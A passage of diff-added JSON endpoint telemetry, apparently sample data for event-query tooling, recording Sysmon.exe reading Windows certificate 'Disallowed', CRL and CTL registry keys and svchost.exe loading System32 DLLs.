"Disallowed", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "execmodelproxy.dll", + "image_path": "C:\\Windows\\System32\\execmodelproxy.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570901840000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ResourcePolicyClient.dll", + "image_path": "C:\\Windows\\System32\\ResourcePolicyClient.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570901840000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 